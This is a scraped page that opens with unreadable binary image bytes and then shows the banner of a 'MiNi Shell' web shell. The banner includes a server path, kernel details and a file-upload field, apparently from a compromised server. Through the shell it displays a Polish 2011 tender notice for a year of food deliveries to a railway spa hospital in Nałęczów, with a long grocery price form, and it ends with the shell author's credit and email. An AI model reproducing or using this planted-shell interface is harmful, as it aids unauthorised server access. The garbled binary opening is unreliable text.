JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20110404/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20110404/63440-N-2011.html

<p class="kh_header"><b>Nałęczów: Cykliczne dostawy art. spożywczych na potrzeby  żywieniowe Kolejowego Szpitala Uzdrowiskowego w Nałęczowie SPZOZ w okresie 12 miesięcy 2011/2012</b><br>
<b>Numer ogłoszenia: 63440 - 2011; data zamieszczenia: 04.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Kolejowy Szpital Uzdrowiskowy w Nałęczowie SP ZOZ , ul. Górskiego 6, 24-140 Nałęczów, woj. lubelskie, tel. 081 5014208 wew. 32, faks 081 5014302.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ebip.lublin.pl/5/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Cykliczne dostawy art. spożywczych na potrzeby  żywieniowe Kolejowego Szpitala Uzdrowiskowego w Nałęczowie SPZOZ w okresie 12 miesięcy 2011/2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Załącznik Nr 3
Formularz cenowy wraz z 12 miesięcznym zapotrzebowaniem.

Kasze, mąki
L.p	Asortyment/gramatura	j.m.	Ilość	Cena jedn. Netto	Wartość Netto kol. 4 x kol. 5	Kwota VAT	Wartość brutto kol. 6 + kol. 7
1	2	3	4	5	6	7	8
1.		Kasza jęczmienna a 1 kg	kg	280				
2.		Kasza manna a 1kg	kg	150				
3.		Kasza gryczana a l kg	kg	180				
4.		Ryż biały a l kg	kg	800				
5.		Ryż długoziarnisty typu Knorr porboiled a 1kg	kg	300				
6.		Płatki owsiane a 1/2 kg	kg	130				
7.		Mąka ziemniaczana a 1 kg	kg	80				
8.		Kasza jaglana a 1 kg	kg	100				
9.		Mąka pszenna typ 450	kg	2100				
10.		Płatki kukurydziane a 1kg	kg	100				
11.		Płatki ryżowe a 0,50 kg
	kg	15				
	RAZEM	X	X	X			
Makarony, przyprawy, dodatki
1	2	3	4	5	6	7	8
1.		Makaron różny a 1 kg, (lubelski lub inny o
podobnych parametrach typu spaghetti, łazanka, nitka, wstążka)	kg	1200				
2.		Bułka tarta a 0,5 kg, typu wrocławska-mamut	kg	300				
3.		Zupa porowa 1kg	kg	10				
4.		Cukier biały a 1 kg	kg	3300				
5.		Cukier puder a 0,4 kg,	kg	180				
6.		Miód naturalny, porcjowany a 25 g	kg	15000				
7.		Miód naturalny wielokwiatowy a 0,4 kg	kg	50				
8.		Majonez a, 1kg	kg	800				
9.		Majonez a, 0,3kg	szt.	160				
10.		Sałatka wielowarzywnaa0,91	szt	110				
11.		Przyprawa do drobiu a 1 kg typu Delikat	szt	10				
12.		Chrzan tarty 0,9 kg,	szt	280				
13.		Cynamon a 20g	szt	200				
14.		Przyprawa do mięs 1 kg typu Delikat	szt	12				
15.		Chrzan tarty a 0,3kg	szt	120				
16.		Papryka konserwowa a 0,9 kg	szt	300				
17.		Peperonata paprykowa a 3,2 kg 
Kolorowa papryka cięta w zalewie
pomidorowej typu Knorr - kuchnia włoska	szt	24				
18.		Kukurydza konserwowa a 2,60 kg	szt	200				
19.		Kukurydza konserwowa a 0,40	szt	300				
20.		Herbata expr. (typu Saga lub inna o podobnych parametrach, oryginalna cejlońska) a 100 szt.	op.	1200				
21.		Przyprawa wpłynie Winiary lub inna o podobnych parametrach a 1l	l.	430				
22.		Przyprawa w płynie Winiary lub inna o podobnych parametrach a 200 ml	szt	120				
23.		Majeranek a 1 kg	szt	12				
24.		Żelatyna a 1 kg	kg	90				
25.		Pieprz naturalny a 1 kg	szt	28				
26.		Pieprz ziołowy a 0,5 kg	szt	5				
27.		Ziele angielski a 1/2 kg	szt	5				
28.		Liście laurowe a 0,3 kg	szt	10				
29.		Kwasek cytrynowy a 1 kg	szt	24				
30.		Sól a 1 kg	kg	850				
31.		Kakao a 0,1 kg, 0,2 kg	kg	35				
32.		Cukier wanilinowy a 0,02 kg	szt	800				
33.		Suchary a 300g	szt	40				
34.		Kawa Ink a 0,l5 kg	szt	320				
35.		Ocet spirytusowy a 1/2 1.	szt	200				
36.		Koncentrat barszczu a 0,30 kg	szt	30				
37.		Sos myśliwski 1,5 kg	kg	3				
38.		Proszek do pieczenia a 30 g	szt	550				
39.		Żurek, barszcz biały a 1 kg	kg	12				
40.		Soda oczyszczana a 70 g	szt	80				
41.		Aromaty mix a l0ml	szt	240				
42.		Barszcz czerwony a 1 kg	kg	24				
43.		Sos pieczeniowy ciemny a 1 kg	kg	18				
44.		Sos neapolitański	kg	14				
45.		Zupa brokułowa	kg	6				
46.		Zupa porowa 	kg	5				
47.		Zupa pomidorowa a 1 kg	szt	6				
48.		Rosół drobiowo-wołowy a 1 kg	szt	8				
49.		Zupa selerowa a 1 kg	kg	20				
50.		Zupa ogonowa a 1kg	kg	8				
51.		Zupa pieczarkowa a 1 kg	kg	10				
52.		Zupa cebulowa a 1 kg	kg	80				
53.		Zupa grzybowa a 1 kg	kg	12				
54.		Zupa grochowa a 1 kg	kg	10				
55.		Sos ogrodowy a 1 kg (sałatkowy)	kg	30				
56.		Sos grzybowy a 1 kg	kg	10				
57.		Papryka mielona a 0,5 kg, 1 kg	szt	20				
58.		Przyprawa do ryb a 0,7 kg typu Delikat	szt	12				
59.		Groszek ptysiowy a 1 kg	kg	120				
60.		Przyprawa do pierników a 0,02	szt	350				
61.		Cukier a 0,5 kg w saszetkach 	szt	20				
62.		Rosół drobiowy a 60 g	szt	30				
63.		Rosół wołowy a 60g	szt	50				
64.		Fasolka biała konserwowa a 400g	szt	24				
65.		Fasolka konserwowa mieszanka a 400g	szt	24				
66.		Groch łupany a 0,50 kg	szt	60				
67.		Musztarda a 1kg	kg	330				
68.		Musztarda a 0,20 kg 	szt	240				
	RAZEM	X	X	X			
Przetwory owocowo-warzywne
1	2	3	4	5	6	7	8
1.		Przecier pomidorowy (Pudliszki lub inny o podobnych parametrach) a 1kg	kg	280				
2.		Przecier pomidorowy (Pudliszki lub urny o podobnych parametrach) a 0,20 kg	kg	70				
3.		Dżem owocowy (Tarczyn, lub inny o podobnych parametrach) a 1kg mix	kg	40				
4.		Dżem porcjowany a 0,25 g mix	szt	17000				
5.		Sok grejpfrutowy, a 11 typu Tarczyn, Fortuna	szt	100				
6.		Sok pomarańczowy typu Fortuna Tarczyn, a 11	szt	60				
7.		Sok jabłkowy typu Tarczyn, Fortuna, a1l	szt	60				
8.		Sok pomidorowy a 0,31	szt	1500				
9.		Marmolada twarda a 0,90 kg	szt	30				
10.		Groszek konserwowy, a 2,6 kg	szt	180				
11.		Keczup a l kg	szt	350				
12.		Keczup a 0,5 kg	szt	150				
13.		Pomidor w zalewie a 2 kg	szt	120				
14.		Syrop owocowy a 1/2 1, typu Herbapol	szt	180				
15.		Rodzynki a 0,2 kg	kg	140				
16.		Orzech włoski a 0,2 kg	szt	250				
17.		Ananasy konserwowe a 0,58 kg piastry	szt	230				
18.		Brzoskwinie konserwowe a 0,85 kg	szt	100				
19.		Kotlet sojowy a 0,1 kg	szt	30				
20.		Powidła śliwkowe a 0,90 1	szt	30				
21.		Płatki migdałowe a 1 kg	kg	5				
22.		Śliwka suszona a 0,1 kg	kg	20				
23.		Morele suszone a 0,1 kg	kg	20				
24.		Wiórki kokosowe a 0,1 kg	kg	5				
25.		Kisiel (Winiary lub inny o podobnych parametrach) a 1 kg	kg	130				
26.		Budyń (Winiary lub inny o podobnych parametrach) a 1 kg	kg	130				
27.		Galaretka (Winiary lub inna o podobnych parametrach) a 1 kg	kg	10				
28.		Czosnek mielony 0,5 kg	szt	24				
29.		Jarzynka a 1 kg	szt	120				
30.		Pieczarki konserwowe a 0,9 kg	szt	120				
31.		Ogórki konserwowe a 0,9 kg	szt	600				
32.		Gruszki w syropie a 850 g	szt	24				
33.		Seler konserwowy a 0,24 kg	szt	1200				
34.		Koper suszony a 0,50 kg	szt	3				
35.		Fasola czerwona a 2,60 kg	szt	60				
36.		Fasola czerwona a 0,40 kg	szt	80				
37.		Mak niebieski a 0,25 kg	kg	40				
38.		Kminek a 0,02 kg	szt	20				
39.		Ziarenka smaku a 0,2 kg	szt	350				
40.		Aroma mix ziołowo maślana a 1,2 kg	szt	30				
41.		Przyprawa do flaków a 0,50 kg	szt	5				
42.		Groszek zielony a 0,40 kg	szt	240				
43.		Mieszanka skórek a l00g	szt	50				
44.		Koktajl tropikalny a 425 g	szt	48				
45.		Oliwki zielone z papryką a 900g	szt	10				
46.		Daktyle drylowane a l00g	szt	50				
47.		Figi suszone a 200g	szt	50				
48.		Migdały	kg	4				
49.		Gałka muszkatołowa 0,02 kg	szt	20				
50.		Imbir 0,02 kg	szt	20				
51.		Pomidorina a 2,60 kg	szt	24				
52.		Skórka pomarańczowa a l00g	szt	100				
	RAZEM	X	X	X			
Tłuszcze roślinne
1	2	3	4	5	6	7	8
1.		Margaryna typu Śniadaniowa a 0,5 kg	kg	1200				
2.		Margaryna typu Bielska a 0,25 kg	kg	850				
3.		Olej a 0,9 l,	szt	850				
4.		Olej a 1/2 l	szt	200				
5.		Masło roślinne kubek a 0,25 kg	kg	40				
	RAZEM	X	X	X			

Gdy gramatura jest w szt.-  proszę podać wartości za 1 szt. zgodnie z zalecaną gramaturą opakowania, gdy gramatura jest w kg należy podać cenę 1 kg


Zbiorcze zestawienie grup produktów
L.p.	Asortyment 	Wartość netto	Kwota VAT	Wartość brutto
1	Kasze, mąki			
2	Makarony, przyprawy, dodatki			
3	Przetwory owocowo-warzywne			
4	Tłuszcze roślinne 			
	RAZEM			

Wyliczoną wartość z pozycji RAZEM należy przenieść do formularza ofertowego.






























Kolejowy Szpital Uzdrowiskowy w Nałęczowie SPZOZ
2011.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających stanowiących nie więcej niż 20% wartości zamówienia podstawowego w zakresie zapotrzebowanego asortymentu.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.89.40.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest wykazanie przez Wykonawcę realizacji co najmniej 2 dostaw  w zakresie tożsamym z zamówieniem w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie.Zgodnie z 12 miesięcznym zapotrzebowaniem stanowiącym załącznik do specyfikacji. Zamawiająct żąda by produkty wymienione w części makarony, przyprawy, dodatki pozycje 3,11,14,17,21,22,37,39,42-55 oraz przetwory owocowo-warzywne miały wydajność nie gorszą od produktów firmy Knorr i pochodziły od producenta posiadającego certyfikat BRC, IFS lub równoważny. Zamawiające żąda także wskazania producenta oferowanych produktów 
 


W wykazie dostaw powinny znaleźć się dostawy o wartości minimalnej 90% złożonej przez Wykonawcę oferty, przy czym czas trwania dostawy musi odpowiadać okresowi na jaki składana jest oferta (12 miesięcy), zaś rodzaj dostaw był tożsamy, należy dołączyć dokumenty potwierdzające, że te dostawy zostały wykonane lub są wykonywane należycie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ebip.lublin.pl/5/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nazwa zamawiającego:	Kolejowy Szpital Uzdrowiskowy w Nałęczowie SPZOZ
Adres zamawiającego:	Górskiego 6
Kod Miejscowość: 	24-140 Nałęczów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.04.2011 godzina 10:00, miejsce: Nazwa zamawiającego:	Kolejowy Szpital Uzdrowiskowy w Nałęczowie SPZOZ
Adres zamawiającego:	Górskiego 6
Kod Miejscowość: 	24-140 Nałęczów
pok.nr 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com